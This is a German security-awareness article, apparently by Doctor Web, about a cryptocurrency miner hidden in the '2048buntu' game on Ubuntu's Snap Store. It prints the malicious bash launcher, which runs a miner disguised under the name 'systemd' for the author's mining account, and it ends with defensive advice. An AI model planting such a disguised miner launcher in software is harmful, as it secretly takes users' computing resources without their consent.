Sie verwenden einen veralteten Browser!

Die Seite kann inkorrekt angezeigt werden.

Ungeladene Gäste

Незваные гости

Andere Ausgaben dieser Rubrik (19)
  • Zu Favoriten hinzufügen
    Registerkarte hinzufügen

«My First Ferrari»

Gelesen: 21688 Kommentare: 3 Rating: 8

Montag, 21. Mai 2018

Encoder für Linux sind keine Neuheit unserer Zeit. Ohne viel Lob für uns selbst auszusprechen, waren wir allerdings die ersten, die einen solchen Encoder unter Linux gefunden haben. Miner für Linux gibt es auch. Es ist nichts Neues, dass es Cyber-Kriminelle auf Kosten von Anwendern auf dieses Betriebssystem abgesehen haben.

In der beliebten Linux-Distribution Ubuntu gibt es seit kurzem ein neues App-Format – das snap-Paket. Es gibt auch einen neuen Snap Store, der dem Windows Store sehr ähnlich ist. Der Haken hier: die Apps werden nicht auf Schadcode geprüft.

Ein vorsichtiger Nutzer entdeckte im Code einer Spiel-App einen Schädling zum Schürfen von Kryptowährung und ein Skript, welches das automatische Starten dieses Schädlings auslöste.

Ein offener Quellcode ist eine gute Sache. Dieser sieht so aus: 


#!/bin/bash

currency=bcn
name=2048buntu


{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores < 4 )); then
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}

https://github.com/canonical-websites/snapcraft.io/issues/651

Niemand nahm jedoch Notiz davon. Ähnliche Mining-Trojaner und Skripts gab es auch in anderen Apps desselben Autors. Der Schadcode schürfte unter dem Namen „My first Ferrari“ Kryptowährung für den Übeltäter. Leider gibt es im Ubuntu Snap Store keinen Download-Zähler, sodass man bis heute nicht weiß, ob der Kriminelle auf diese Weise für seinen ersten Ferrari verdienen konnte.

„Die komplette Wahrheit über Viren & Co.“ empfiehlt

  1. Bleiben Sie wachsam, wenn Sie Linux benutzen. Auch wenn jeder den offenen Quellcode prüfen kann, bedeutet dies nicht, dass der Quellcode überhaupt geprüft wurde. Häufig verlässt man sich auf andere, während sich eine Sicherheitslücke oder ein Schadcode auf eine Vielzahl von Workstations und Servern verbreitet.
  2. Prüfen Sie entweder den Code jeder App, die Sie installieren wollen, oder machen Sie von einer Virenschutzsoftware Gebrauch.

[Twitter]

Ihre Meinung ist uns wichtig

Um einen Kommentar zu publizieren, müssen Sie sich über Ihr Konto auf der Webseite von Doctor Web einloggen. Wenn Sie noch kein Konto haben, können Sie es anlegen.

Kommentare der Teilnehmer

Kommentare zu anderen Ausgaben | Meine Kommentare